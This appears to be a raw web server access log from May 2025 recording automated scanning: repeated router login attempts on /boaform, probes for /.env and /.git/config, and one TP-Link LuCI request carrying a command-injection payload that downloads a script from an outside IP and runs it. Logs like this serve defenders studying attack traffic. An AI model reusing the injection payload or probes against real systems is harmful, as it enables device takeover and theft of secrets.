45.134.225.133 - - [07/May/2025:12:58:39 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:12:59:29 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:00:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.242.226.12 - - [07/May/2025:13:01:03 +0530] "\x16\x03\x01" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:13:01:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:01:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:02:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:02:25 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
104.234.115.113 - - [07/May/2025:13:03:27 +0530] "\x16\x03\x01" 400 226 "-" "-"
104.234.115.113 - - [07/May/2025:13:03:38 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.248.174.49 - - [07/May/2025:13:04:09 +0530] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
104.248.174.49 - - [07/May/2025:13:04:10 +0530] "GET /.git/config HTTP/1.1" 404 209 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
45.134.225.133 - - [07/May/2025:13:04:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:04:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
153.239.3.0 - - [07/May/2025:13:04:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:05:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:05:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
117.192.235.161 - - [07/May/2025:13:05:44 +0530] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 216 "-" "Hello, World"
161.248.238.13 - - [07/May/2025:13:06:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:07:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:13:07:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:07:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:13:07:34 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:08:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:13:09:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:13:09:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
93.174.93.12 - - [07/May/2025:13:09:27 +0530] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:13:09:30 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:09:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:13:10:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
93.174.93.12 - - [07/May/2025:13:10:29 +0530] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:13:11:46 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:11:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:12:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:12:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:13:13:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
161.248.238.13 - - [07/May/2025:13:13:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:14:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:15:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:16:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:16:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:17:14 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:17:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:18:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:18:53 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:13:20:20 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:20:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:13:20:32 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:21:04 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:21:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:22:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:24:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:24:03 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:25:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:13:25:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:25:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:27:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:27:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.7 - - [07/May/2025:13:28:12 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:13:28:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:29:24 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:30:26 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:13:30:39 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:13:31:25 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:31:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:32:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:33:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
20.98.137.225 - - [07/May/2025:13:34:40 +0530] "GET /developmentserver/metadatauploader HTTP/1.1" 404 232 "-" "Mozilla/5.0 zgrab/0.x"
45.134.225.133 - - [07/May/2025:13:35:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:35:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:35:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:13:36:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:36:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
20.98.137.225 - - [07/May/2025:13:36:38 +0530] "GET /developmentserver/metadatauploader HTTP/1.1" 404 232 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.34 - - [07/May/2025:13:36:39 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:37:05 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:13:37:08 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:13:37:08 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:13:37:08 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:13:37:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:13:37:44 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
212.107.12.18 - - [07/May/2025:13:38:04 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:13:38:49 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:39:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:13:40:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
161.248.238.13 - - [07/May/2025:13:40:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:41:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:41:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.98.11.128 - - [07/May/2025:13:41:47 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1" 404 224 "-" "Go-http-client/1.1"
95.214.54.4 - - [07/May/2025:13:41:50 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:42:03 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:13:42:45 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:42:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:43:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:43:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:13:43:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.122 - - [07/May/2025:13:43:34 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:44:08 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:44:08 +0530] "GET /css/images/PTZOptics_powerby.png HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:44:08 +0530] "GET /solr/ HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:44:38 +0530] "GET /index.jsp HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:45:09 +0530] "GET /static/historypage.js HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.122 - - [07/May/2025:13:45:36 +0530] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:45:36 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:45:37 +0530] "GET /login.do HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:45:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.122 - - [07/May/2025:13:46:05 +0530] "GET /zabbix/favicon.ico HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:46:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.122 - - [07/May/2025:13:46:33 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:46:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:13:46:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.122 - - [07/May/2025:13:46:54 +0530] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.122 - - [07/May/2025:13:47:12 +0530] "GET /owncloud/status.php HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:47:26 +0530] "GET /status.php HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:47:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.122 - - [07/May/2025:13:47:40 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:47:41 +0530] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:47:58 +0530] "GET /api/session/properties HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:48:13 +0530] "GET /identity HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:48:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.123 - - [07/May/2025:13:48:29 +0530] "GET /xmldata?item=all HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:48:32 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:48:32 +0530] "GET /internal_forms_authentication HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:48:50 +0530] "GET /showLogin.cc HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.122 - - [07/May/2025:13:49:07 +0530] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
